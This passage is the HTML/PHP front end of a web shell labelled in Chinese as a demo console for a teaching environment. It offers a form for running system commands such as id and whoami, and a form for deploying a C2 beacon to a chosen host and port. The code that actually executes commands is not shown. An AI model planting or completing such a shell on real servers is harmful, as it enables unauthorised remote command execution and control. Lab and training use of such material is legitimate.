  pre { background:#1e1e1e; border:1px solid #3c3c3c; border-radius:4px; padding:10px; white-space:pre-wrap; word-break:break-all; max-height:300px; overflow:auto; }
  .ok { color:#6a9955; }
</style>
</head>
<body>
<h1>演示用 WebShell 控制台 (教学环境)</h1>

<div class="panel">
  <h2>命令执行</h2>
  <form method="post">
    <div class="row">
      <input type="text" name="cmd" placeholder="例如: id / whoami / uname -a" style="width:60%">
      <button type="submit">执行</button>
    </div>
  </form>
  <?php if ($cmd_result !== ''): ?>
  <pre><?php echo htmlspecialchars($cmd_result); ?></pre>
  <?php endif; ?>
</div>

<div class="panel">
  <h2>C2 Beacon 部署</h2>
  <form method="post">
    <div class="row">
      <label>C2 地址</label>
      <input type="text" name="c2_host" value="<?php echo htmlspecialchars($c2_host); ?>">
    </div>
    <div class="row">
      <label>C2 端口</label>
      <input type="text" name="c2_port" value="<?php echo htmlspecialchars($c2_port); ?>">
    </div>
    <div class="row">
      <button type="submit" name="deploy" value="1">部署 Beacon</button>
    </div>
  </form>
  <?php if ($deploy_msg !== ''): ?>
  <pre class="ok"><?php echo htmlspecialchars($deploy_msg); ?></pre>
  <?php endif; ?>
</div>

</body>
</html>
